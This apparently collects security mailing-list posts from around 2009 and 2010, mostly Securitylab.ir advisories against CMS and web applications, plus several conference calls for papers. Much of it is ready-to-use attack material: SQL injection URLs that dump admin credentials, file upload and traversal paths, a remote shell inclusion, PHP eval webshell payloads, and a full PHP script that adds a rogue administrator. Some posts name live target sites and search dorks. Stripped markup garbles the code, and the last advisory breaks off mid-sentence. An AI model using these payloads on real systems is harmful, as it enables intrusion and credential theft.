Re: Microsoft Outlook Web Access (OWA) v8.2.254.0 id parameter Information Disclosure Vulnerability
Not working , Tested on : XpSp2 , IE6
Ziggurat CMS Multiple Vulnerabilities
# # Securitylab.ir # # Application Info: # Name: Ziggurat CMS # Vendor: http://www.farsi-cms.com # Vulnerability: # Arbitrary File Upload http://site.com/manager/upload.asp # Remote File Download http://site.com/manager/backup.asp?bck=./../file.asp # Cross Site Scripting http://site.com/index.asp?id=script(xss)/script # # 2010-04-10 - Vendor notified # 2010-04-15 - Public disclosure # # Discoverd By: Pouya Daneshmand # Website: http://Pouya.Securitylab.ir # Contacts: info[at]securitylab.ir whh_iran[at]yahoo.com ###
Vana CMS Remote File Download
# # Securitylab.ir # # Application Info: # Name: Vana CMS # Vendor: http://www.vanasoft.com # # Vulnerability Info: # Type: Remote File Download # Risk: Medium # 2009-10-23 - Found Vulnerability # 2010-04-09 - Vendor notified # 2010-04-11 - Public disclosure # Vulnerability: http://site.com/download.php?filename=File.php # # Discoverd By: Pouya Daneshmand # Website: http://Pouya.Securitylab.ir # Contacts: info[at]securitylab.ir whh_iran[at]yahoo.com ###
Hack.lu 2010 CfP
Call for Papers Hack.lu 2010 The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each others and share freely all kind of information. The convention will be held in the Grand-Duchy of Luxembourg in October 2010 (27-29.10.2010). The most significant new discoveries about computer network attacks and defenses, commercial security solutions, and pragmatic real world security experience will be presented in a three days series of informative tutorials. We would like to announce the opportunity to submit papers, and/or lightning talk proposals for selection by the hack.lu technical review committee. This year we will be doing workshops on the first day and talks of 1 hour or 30 minutes in the main track the two following days. Scope == Topics of interest include, but are not limited to : * Software Engineering and Security * Honeypots/Honeynets * Spyware, Phishing and Botnets (Distributed attacks) * Newly discovered vulnerabilities in software and hardware * Electronic/Digital Privacy * Wireless Network and Security * Attacks on Information Systems and/or Digital Information Storage * Electronic Voting * Free Software and Security * Assessment of Computer, Electronic Devices and Information Systems * Standards for Information Security * Legal and Social Aspect of Information Security * Software Engineering and Security * Security in Information Retrieval * Network Security * Forensics and Anti-Forensics * Mobile Communications Security and Vulnerabilities Deadlines = The following dates are important if you want to participate in the CfP Abstract submission : no later than 1st June 2010 Full paper submission : no later than 15th July 2010 Notification date : mid of August Submission guideline Authors should submit a paper in English up to 5.000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result, by electronic means. Abstract is up to 400 words. Submissions must be sent to http://2010.hack.lu/cfp/ Submissions should also include the following: 1. Presenter, and geographical location (country of origin/passport) and contact info. 2. Employer and/or affiliations. 3. Brief biography, list of publications or papers. 4. Any significant presentation and/or educational experience/background. 5. Reason why this material is innovative or significant or an important tutorial. 6. Optionally, any samples of prepared material or outlines ready. 7. Information about if yes or no the submission has already been presented and where. Presentations/topics that haven't been presented before will be rewarded. The information will be used only for the sole purpose of the hack.lu convention including the information on the public website. If you want to remain anonymous, you have the right to use a nickname. If the paper is not accepted in the main track, it could be accepted in short or lightning talk session but in this case the speakers' privileges are not applicable. Speakers' Privileges * Accommodation will be provided (3 nights) * Travel expenses will be covered up to a max amount * Conference speakers night Publication and rights == Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication. Sponsoring == If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu Web site and wiki = http://www.hack.lu/ CfP website : http://2010.hack.lu/cfp/
XSS vulnerability in easy page cms
# # Securitylab.ir # # Application Info: # Name: Easy Page # Vendor: http://easypage.org # # Vulnerability Info: # Type: XSS # Risk: low # Vulnerability: http://site.ir/default.aspx?page=Documentapp=DocumentsdocId=1docParId=script(xss)/script # # Discoverd By: Pouya Daneshmand # Website: http://Pouya.Securitylab.ir # Contacts: info[at]securitylab.ir whh_iran[at]yahoo.com ###
Joomla Component com_xmap Sql Injection Vulnerability
# # Securitylab.ir # # Application Info: # Name: Joomla Component com_xmap # # Vulnerability Info: # Type: Sql Injection # Risk: Medium # Vulnerability: http://site.com/index.php?option=com_xmapsitemap=2Itemid=18-1 UNION SELECT 1,2,3,version(),5,6,7,8-- # # Discoverd By: Pouya Daneshmand # Website: http://Pouya.securitylab.ir # Contacts: admin[at]securitylab.ir whh_iran[AT]yahoo.com ###
IE 6.0 - Local Crash Exploit
###
# Securitylab.ir
###
Vul:
object id=opi classid=clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6
style=display:none;
/object
script
function crash() {
var buff = '';
for(i=0;i=5000;i++) {buff+=AA;}
object = document.getElementById(opi);
object.Start5QIMWithItv('test','test',buff);
}
/script
pre
a href=javascript:; OnClick=crash().!./a
/pre
###
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand
(whh_i...@yahoo.com,Pouya.Securitylab.ir)
###
Official Portal 2007 Multiple Vulnerabilities
# # Securitylab.ir # # Application Info: # Name: Official Portal 2007 # # Vulnerability Info: # Type: Sql Injection/XSS # Risk: Medium # Dork: Official Portal 2007 # Vulnerability: === Sql Injection === http://site.com/?fa=content.detailid=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser-- === Cross Site Scripting === http://site.com/?fa=SCRIPT/SRC=http://site.com/xss.js;/SCRIPT # Live Test: http://www.bkd-bandungkab.com # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir whh_iran[at]yahoo.com ###
Pixel Portal Sql Injection Vulnerability
# # Securitylab.ir # # Application Info: # Name: Pixel Portal # Vendor: http://www.pixelidea.ir # # Vulnerability Info: # Type: Sql Injection # Risk: Medium # Vulnerability: http://site.ir/products_list_fa.asp?id=-1001+UNION+ALL+SELECT+1,2,3,4,5,6,7,username,password,10,11,12,13+Form+admin # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir whh_iran[AT]yahoo.com ###
Re: Re: Joomla (Jw_allVideos) Remote File Download Vulnerability
You right. it's working at version 1.0 only ;) # Application Info: # Name: Joomla (jw_allvideos Plugin) # Version: 1.0
Joomla (Jw_allVideos) Remote File Download Vulnerability
# # Securitylab.ir # # Application Info: # Name: Joomla (jw_allvideos Plugin) # Version: 1.0 # # Vulnerability Info: # Type: Remote File Download # Risk: Medium # # Vulnerability: # http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir whh_iran[AT]yahoo.com ###
IE address bar characters into a small feature
# # Securitylab.ir # # Application Info: # Name: Internet Explorer # Version: 8.0 # Vulnerability: IE address bar characters into a small feature My IE 8 on the address bar will automatically enter the url of the \ (0x5c) transformed into / (0x2f) Example: www.securitylab.ir \a Converted to www.securitylab.ir/a Recently found that some phishing sites take advantage of this feature to bypass some security checks, it is hereby to be a mark # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir whh_iran[AT]yahoo.com ###
mongoose Space Character Remote File Disclosure Vulnerability
# # Securitylab.ir # # Application Info: # Name: mongoose # Version: 2.8 # Download: http://code.google.com/p/mongoose/downloads/list # # Vulnerability Info: # Type: Remote Source Disclosure # Risk: Medium # # Vulnerability: # http://127.0.0.1/file.php%20%20%20 # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir whh_iran[AT]yahoo.com ###
Tavanmand Portal (fckeditor) Remote Arbitrary File Upload Vulnerability
# # Securitylab.ir # # Application Info: # Name: Tavanmand Portal # version: 1.1 # Vendor: http://www.tavanmand.ir # Vulnerability: http://site.ir/fckeditor/editor/filemanager/upload/test.html Uploaded file here http://site.ir/UserFiles/FILE.ASPX # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir whh_i...@yahoo.com ###
eWebeditor ASP Version Multiple Vulnerabilities
# # Securitylab.ir # # Application Info: # Name: eWebeditor # Version: ASP # Vulnerability: === Arbitrary File Upload === form action = http://site.com/manage/ewebeditor/upload.asp?action=savetype=IMAGEstyle=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a method = post name = myform enctype = multipart / form-data p align=center input type=file name=uploadfile size=100br br input type=submit value=Uploadnbsp; /p /form === Arbitrary File Upload 2 === http://site.com/admin/ewebeditor/ewebeditor.htm?id=bodystyle=popup === Database Disclosure === http://site.com/ewebeditor/db/ewebeditor.mdb === Administrator bypass === http://site.com/eWebEditor/admin/login.asp put this code instead URL javascript: alert (document.cookie = adminpass = + escape ( admin)); === Directory Traversal === http://site.com/admin/ewebeditor/admin/upload.asp?id=16d_viewmode=dir=./.. === Directory Traversal 2 === http://site.com/ewebeditor/asp/browse.asp?style=standard650dir=./.. # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir whh_i...@yahoo.com ###
RaakCms Multiple Vulnerabilities
# # Securitylab.ir # # Application Info: # Name: RaakCms # Vendor: http://raakcms.com # Vulnerability: === Arbitrary File Upload === http://site.ir/webmaster/pic.aspx select file and folder , your file upload here: http://site.ir/User_Images/[Folder]/FILE.ASPX === Directory Traversal === http://site.ir/browse.asp?dir=./.. http://site.ir/browseFile.asp?dir=./.. # Live test: http://behzisty-kj.ir # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir whh_i...@yahoo.com ###
Microsoft IE 67 Crash Exploit
# # Securitylab.ir # # Application Info: # Name: Microsoft IE # Version: 6 7 # Tested on : XP(SP1/SP2/SP3) # # Vulnerability Info: # Type: Crash # Risk: Medium # Vulnerability: IE.html scriptdocument.createElement(html).outerHTML/script # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir whh_i...@yahoo.com ###
eWebeditor Directory Traversal Vulnerability
# # Securitylab.ir # # Application Info: # Name: eWebeditor # Version: all version # # Vulnerability Info: # Type: Directory Traversal # Risk: Medium # # Vulnerability: # http://site.com/admin/ewebeditor/admin/upload.asp?id=16d_viewmode=dir =./.. # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir whh_i...@yahoo.com ###
QvodPlayer ColorFilter Codec ActiveX Remote Exec
###
# QvodPlayer ColorFilter Codec ActiveX Remote Exec
# Download : http://www.qvod.com
###
# Vulnerability:
# object id=TestObj classid=CLSID:{432F118C-DB79-4561-9799-CC95EA78208B}
style=width:100;height:350/object
###
# Tested on XpSP2 IE6/7
###
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir
###
DBHCMS Web Content Management System v1.1.4 RFI Vulnerability
# Securitylab.ir # Application Info: # Name: DBHCMS Web Content Management System # Version: 1.1.4 # Download: :( # # Discoverd By: Securitylab.ir # Website: http://Securitylab.ir # Contacts: admin[at]securitylab.ir k4mr4n...@yahoo.com # # Vulnerability Info: # Type: RFI (Remote File Inclusion) # Risk: High #=== # http://site.com/index.php?dbhcms_core_dir=http://site.com/shell.txt%00 # Need: register_globals = ON and allow_url_include = ON #=== # Securitylab Security Research Team ###
QuahogCon Call for Papers
About QuahogCon QuahogCon is a new regional conference for the hacker culture in all forms. Hardware, Software, Security, Social, Eco Hacking, Zero Impact Living. Like most hacker cons, it will run Friday to Sunday. We'll have two tracks: one for InfoSec topics and the other track will be a mix of all the other topics with a bit of an emphasis on hardware hacking and DIY electronics. Besides our perennial InfoSec favorites, we want to hear from some new voices on a wider range of topics. If it's a good hack, we want to hear what you're doing. QuahogCon will be held April 23rd-25th, 2010 at Hotel Providence in Providence, RI Call for Papers Opens today! Come one, come all! Screw up your courage and get up to talk in front of a room full of folks at QuahogCon! We're a new conference in Providence, RI, looking to give you a place in the Northeast to present your ideas on Information Security and Maker Culture. We're here to encourage the hacker ethic in all its forms. Conference Format QuahogCon has two tracks: * Information Security * Maker Culture Some topics may fit into both tracks, such as a hardware hack that exposes a security vulnerability. Choose one or both tracks when submitting your proposal and we'll figure it out when we make the schedule. Information Security Track We're looking for interesting presentations on new, original security research. It would be best to debut a whole new talk, but updates to existing recent work are perfectly acceptable, too. We're looking to hear from both new voices and the usual suspects. A minor amount of preference will be given to folks from the Northeast who have never presented at a con before, for whatever reason. Maker Culture Here's where things will get really crazy. This is a pretty inclusive track, so just about anything goes. Made a difference engine out of Reese's Peanut Butter Cups and Pixie Stix? We want to hear about it. Living in a commune with some friends, composting humanure and using it to grow the most incredible vegetables ever? We want to hear about it. Got a microcontroller project monitoring your personal methane production? We want to hear about it. We're expecting a lot of new voices in this track. Make yours one of them. Talk Length Some folks have a lot to say, others not so much. While we'll probably be tweaking the schedule right up to the wire, we'd like to give folks the option to do either 30 or 60 minute talks. If you can expand or compress your talk, feel free to choose both, as it will allow us more flexibility in scheduling. It is most likely that Sunday will be the 30 minute talk day, but we make no promises. What we need from you * Speaker name(s) and contact information. * Presentation Title. * Track preference and length (InfoSec or Maker, 30 or 60 minutes.) * Keywords and 2-3 sentence abstract. * Document in Text or PDF format which contains the following, preferably in order: o Presenter(s) Name. o Bio limited to 100 words for you OR your group (not 100 words per person.) o Abstract of your presentation limited to 200 words or less. o Detailed outline/description of your topic. o List of other conferences at which submission has been presented. o List of resources requested beyond what is already provided (power, projector with VGA input, sound projection, and internet connectivity.) What you'll get for speaking Accepted speakers will receive free admission to the conference. Since we're a brand new con, we don't have the funds for honorariums this year. We hope to be able to pull that off in the future. Alternates will be selected and will also receive free admission. Alternates should come prepared to speak. Schedule and Updates Please watch the website for updates: http://quahogcon.org/news/ November 2nd, 2009 - QuahogCon Call for Papers opens December 15th, 2009 - Papers due for first round of selections December 31st, 2009 - Final due date for submissions January 24th, 2010 - Speaker selection announced Submit your talk here: http://quahogcon.org/cfp/
PSAtr v1.2 Sql Injection
## Securitylab.ir # Application Info: # Name: PSArt # Version: 1.2 # # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir # # http://site.com/kxfzg/news.asp?id=128%20and%201=2%20union%20select%201,username,3,4,5,6,7,password,9%20from%20admin #=== # # Securitylab Security Research Team ###
PHP168 v6.0 rc
## Securitylab.ir # Application Info: # Name: PHP168 # Version: 6.0 # # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir # # http://site.com/login.php?makehtml=1chdb[htmlname]=seek.phpchdb[path]=cachecontent=?php...@eval($_POST[s]);? #=== # # Securitylab Security Research Team ###
phpcms 2008 Remote File Disclosure Vulnerability
## Securitylab.ir # Application Info: # Name: phpcms 2008 # Version: All # # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir # # Vulnerability Info: # Type: Remote File Disclosure Vulnerability # Risk: Medium #=== # http://site.com/[path]/download.php?a_k=Jh5zIw==i=20m=2f=../include/config.inc.phpt=2233577313ip=127.0.0.1s=m/d=1 #=== # # Securitylab Security Research Team ###
DEDECMS v5.1 Sql Injection Vulnerability
# Securitylab.ir
# Application Info:
# Name: DEDECMS
# Version: 5.1
#
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Sql Injection Vulnerability
# Risk: Medium
#===
# feedback_js.php
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist-dsql-GetOne(Select id From `...@__cache_feedbackurl` where
url='$arcurl' );
if(is_array($row)) $urlindex = $row['id'];
}
if(empty($arcID) empty($urlindex)) exit();
..
if(empty($arcID)) $wq = urlindex = '$urlindex' ;
else $wq = aid='$arcID' ;
$querystring = select * from `...@__feedback` where $wq and ischeck='1' order
by dtime desc;
$dlist-Init();
$dlist-SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select ' and 1=2
union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1
union select * from dede_feedback where 1=2 and ''=' from dede_admin where ''=
#===
#
# Securitylab Security Research Team
###
Various Orion application application server example pages are vulnerable to XSS.
R08-08: Several XSS on Orion Application server 2.0 to 2.0.8 Vulnerability found: May 2008 Revalidated 23 July 2009 Vendor informed: 27th July 09 Vulnerability fixed: Severity: Medium Description: Various Orion application application server example pages are vulnerable to XSS. Orion application server is a java based web application server, http://www.orionserver.com/. Note: Orion application server was tested on Windows XP and JRE 1.6.0_14 The following demonstrate XSS: 1) http://10.0.2.177:8080/examples/jsp/sessions/carts.jsp?item=bodyscriptalert(1)/script/bodysubmit=add 2) http://10.0.2.177:8080/examples/jsp/checkbox/checkresult.jsp?fruit=scriptalert(1)/script 3) http://10.0.2.177:8080/examples/jsp/cal/cal2.jsp?time=scriptalert(1)/script Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link to a Orion Application server site. Such code would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: session IDs) to unauthorised third parties. Fix: Remove sample scripts from live environments. References: http://www.procheckup.com/Vulnerabilities.php Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com) Legal: Copyright 2009 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
DvBBS v2.0(PHP) boardrule.php Sql injection
## Securitylab.ir # Application Info: # Name: DVBBS (php) # Version: 2.0 # Vendor: http://p.dvbbs.net # # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir # # Vulnerability Info: # Type: Sql Injection # Risk: Medium #=== # http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/ #=== # # Securitylab Security Research Team ###
Admin News Tools 2.5 Remote File Download Vulnerability
# Securitylab.ir
# Application Info:
# Name: Admin News Tools
# Version: 2.5
# Website: http://www.adminnewstools.fr.nf
# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
#
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
#===
# Download.php
# header('Content-Disposition: attachment; filename=' . basename
($_GET['fichier']));
# readfile($_GET['fichier']);
# }
#
# http://www.site.com/news/system/download.php?fichier=./../up.php
#===
#
# Securitylab Security Research Team
###
Empire Cms 5.1 sql injection
# Securitylab.ir # Application Info: # Name: Empire Cms # Version: 5.1 # Download: http://www.phome.net/OpenSource/download/EmpireCMS_5.1os_SC_GBK.zip # # Discoverd By: Securitylab.ir # Website: http://Securitylab.ir # Contacts: admin[at]securitylab.ir k4mr4n...@yahoo.com # # Vulnerability Info: # Type: Sql Injection # Risk: Medium #=== # http://site.com/e/tool/gbook/?bid=1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* #=== # Securitylab Security Research Team ###
dedecms v5.3 Arbitrary File Upload Vulnerability
# Securitylab.ir # Application Info: # Name: dedecms # Version: v5.3 # Website: http://dedecms.com # # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir # # Vulnerability Info: # Type: Arbitrary File Upload Vulnerability # Risk: High #=== # http://site.com/member/uploads_edit.php # select file and uploaded # file allowed : file.jpg.php #=== # # Securitylab Security Research Team ###
ecshop 2.6.2
# Securitylab.ir
# Application Info:
# Name: ecshop
# Version: 2.6.2
# Website: http://www.ecshop.com
#
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: i...@securitylab[dot]ir k4mr4n...@yahoo.com
#
#===
# :: integrate.php ::
#
# if ($_REQUEST['act'] == 'sync')
# {
# $size = 100;
# ..
# $tasks = array();
# if ($task_del 0)
# {
# $tasks[] = array('task_name'=sprintf($_LANG['task_del'],
$task_del),'task_status'='span id=task_del' . $_LANG['task_uncomplete'] .
'span');
# $sql = SELECT user_name FROM . $ecs-table('users') . WHERE flag = 2;
# $del_list = $db-getCol($sql);//$del_list
# }
# if ($task_rename 0)
# {
# $tasks[] = array('task_name'=sprintf($_LANG['task_rename'],
$task_rename),'task_status'='span id=task_rename' .
$_LANG['task_uncomplete'] . '/span');
# $sql = SELECT user_name, alias FROM . $ecs-table('users') . WHERE flag
= 3;
# $rename_list = $db-getAll($sql);//$rename_list
# }
# if ($task_ignore 0)
# {
# $sql = SELECT user_name FROM . $ecs-table('users') . WHERE flag = 4;
# $ignore_list = $db-getCol($sql);//$ignore_list
# }
#
# $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] .
'_log.php', 'wb');
# $log = '';
# if (isset($del_list))
# {
# $log .= '$del_list=' . var_export($del_list,true) . ';';
# }
# if (isset($rename_list))
# {
# $log .= '$rename_list=' . var_export($rename_list, true) . ';';
# }
# if (isset($ignore_list))
# {
# $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
# }
# fwrite($fp, $log);
# fclose($fp);
# $smarty-assign('tasks', $tasks);
# $smarty-assign('ur_here',$_LANG['user_sync']);
# $smarty-assign('size', $size);
# $smarty-display('integrates_sync.htm');
# }
#
#
#
http://site.com/admin/integrate.php?act=syncdel_list=?php%20eval($_POST[cmd])?
#
http://site.com/admin/integrate.php?act=syncrename_list=?php%20eval($_POST[cmd])?
#
http://site.com/admin/integrate.php?act=syncignore_list=?php%20eval($_POST[cmd])?
#===
#
# Securitylab Security Research Team
###
LxBlog
# Securitylab.ir # Application Info: # Name: LxBlog # Website: http://www.lxblog.net # # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir # # Vulnerability Info: # Type: Sql/Xss # Risk: Medium #=== # Sql Injection: # http://site.com/user_index.php?action=tagjob=modifytype=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))0),sleep(10),1)/*item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid=1 AND if((ASCII(SUBSTRING(password,1,1))0),sleep(10),1)/* # # Xss: # http://site.com/user_index.php?action=tagjob=modifytype=[XSS]item_type[]=[XSS] #=== # # Securitylab Security Research Team ###
DMXReady Registration Manager Arbitrary File Upload Vulnerability
# Securitylab.ir # Application Info: # Name: DMXReady Registration Manager # Version: 1.1 # Website: http://www.dmxready.com # # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir # # Vulnerability Info: # Type: Arbitrary File Upload Vulnerability # Risk: High # Dork: inc_webblogmanager.asp #=== # http://site.com/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp # select file and uploaded # view file : http://site.com/assets/webblogmanager/shell.aspx #=== # # Securitylab Security Research Team ###
Namad Cms Remote File Download
# Securitylab.ir # Application Info: # Name: Namad # Version: 2.0.0.0 # Website: http://imenafzar.com # # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir i...@securitylab[dot]ir # # Vulnerability Info: # Type: Remote File Download Vulnerability # Risk: Medium # Dork: Copyright 2008 ImenAfzar ver :2.0.0.0 #=== # http://site.ir/SecureDownloads.aspx?Mode=DownloadsType=FilesFileName=../../Web.Config #=== # # Securitylab Security Research Team ###
maxcms2.0 creat new admin exploit
?php
print_r('
+---+
maxcms2.0 creat new admin exploit
by Securitylab.ir
+---+
');
if ($argc 3) {
print_r('
+---+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
+---+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$name = rand(1,1);
$cmd =
'm_username=securitylab'.$name.'m_pwd=securitylabm_pwd2=securitylabm_level=0';
$resp = send($cmd);
if (!eregi('alert',$resp)) {echo[~]bad!,exploit failed;exit;}
print_r('
+---+
[+]cool,exploit seccuss
[+]you have add a new adminuser securitylab'.$name.'/securitylab
+---+
');
function send($cmd)
{
global $host, $path;
$message = POST .$path.admin/admin_manager.asp?action=add HTTP/1.1\r\n;
$message .= Accept: */*\r\n;
$message .= Referer: http://$host$path\r\n;;
$message .= Accept-Language: zh-cn\r\n;
$message .= Content-Type: application/x-www-form-urlencoded\r\n;
$message .= User-Agent: securitylab\r\n;
$message .= X-Forwarded-For:1.1.1.1\r\n;
$message .= Host: $host\r\n;
$message .= Content-Length: .strlen($cmd).\r\n;
$message .= Cookie:
m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin;
m_level=0;
checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n;
$message .= Connection: Close\r\n\r\n;
$message .= $cmd;
echo $message;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
return $resp;
}
?
Call for Papers Hack.lu 2009
Call for Papers Hack.lu 2009 The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each other and share freely all kind of information. The convention will be held in the Grand-Duchy of Luxembourg in October 2009 (28-30.10.2009). The conference is three days of active discussions, presentations and workshops for sharing experience around new attacks, defensive techniques and information security (including funky experiments). We would like to announce the opportunity to submit papers, and/or lightning talk proposals for selection by the hack.lu technical review committee. This year we will be doing one hour talks, and some shorter talk sessions. Scope: -- Topics of interest include, but are not limited to: - Software Engineering and Security - Honeypots/Honeynets - Spyware, Phishing and Botnets (Distributed attacks) - Newly discovered vulnerabilities in software and hardware - Electronic/Digital Privacy - Wireless Network and Security - Attacks on Information Systems and/or Digital Information Storage - Electronic Voting - Free Software and Security - Assessment of Computer, Electronic Devices and Information Systems - Standards for Information Security - Legal and Social Aspect of Information Security - Software Engineering and Security - Security in Information Retrieval - Network security - Forensics and Anti-Forensics - Mobile communications security and vulnerabilities Deadlines: -- The following dates are important if you want to participate in the CfP Abstract submission: no later than 15 June 2009 Full paper submission: no later than 1st August 2009 Notification date: mid/end of August Submission guideline: - Authors should submit a paper in English up to 5.000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result, by electronic means. Abstract is up to 400 words. Submissions must be sent using the following interface: http://2009.hack.lu/papers/ Submissions should also include the following: 1. Presenter, and geographical location (country of origin/passport)and contact info. 2. Employer and/or affiliations. 3. Brief biography, list of publications or papers. 4. Any significant presentation and/or educational experience/background. 5. Reason why this material is innovative or significant or an important tutorial. 6. Optionally, any samples of prepared material or outlines ready. 7. Information about if yes or no the submission has already been presented and where. The information will be used only for the sole purpose of the hack.lu convention including the information on the public website. If you want to remain anonymous, you have the right to use a nickname. Speakers' Privileges: - - Accommodation will be provided (3 nights). - Travel expenses will be covered up to a max amount. - Conference speakers night. Publication and rights: --- Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication. Sponsoring: --- If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu Web site and wiki: -- http://2009.hack.lu/
HP Quality Center vulnerability
Find below the details of a vulnerability in the HP Quality Center product (formely Mercury Quality Center). Introduction -- Quality Center (QC) is a web-based QA testing and management tool. It is a product from HP when they took over Mercury Interactive last year. The front-end of the application is composed of COM components that plug into the web browser. Quality Center provides a customization capability (called workflow) which allow the administrator to modify the default behavior. This workflow is driven by VBScript functions that are called whenever a particular event occurs on the client front-end. In order to optimize the interaction speed of the application, a cache folder is created on the client machine. By default, this folder is located at %tmp%/TD_80. Whenever a user connects to a Quality Center project, 2 folders are created within the cache folder. One of these folders contain a copy of the workflow scripts used to customize the application. Indeed, those files are required on the client machine because the workflow is execute on the client, not on the server. There exists 1 VBScript workflow file per feature. Those are: * Login/Logout (common.tds) * Defects module (defects.tds) * Manual Test Execution (manrun.tds) * Test Requirements module (req.tds) * Test Lab module (testlab.tds) * Test Plan module (testplan.tds) The customization feature of Quality Center is often used for: * Controlling password compliance (no blank password, more than 8 letters, etc.) * Chained lists (when a value is selected in a field, another field gets updated with a list relevant to that value) * Automatic updates to some QC components (Test, Test Set, Defect objects, hidden fields) * Hidding information depending on the user's group (used when a project is shared with different vendors) * Others The workflow is often driven by using the OTA (Open Test Architecture), the Quality Center API. This API allows the manipulation of any QC object (e.g. Subject folder, Test/Defect objects, Fields, etc.). It also allows the direct manipulation of the database used by Quality Center. Issue --- When a user connects to Quality Center, the cache folder is automatically updated with the latest VBScript workflow files. Those files are then read by the QC front-end only once for the whole session. They are then used by the application whenever the associated events are raised. There are 2 main points that make this workflow highly vulnerable: 1. Those files are written in plain text; 2. Marking those files as read-only (through the file properties) will prevent Quality Center from overwriting them. If a user modifies this file and then mark it as read-only, he can execute arbitrary code. As the OTA API allows access to the database, he can also modify the data stored in the database as follows: * Quality 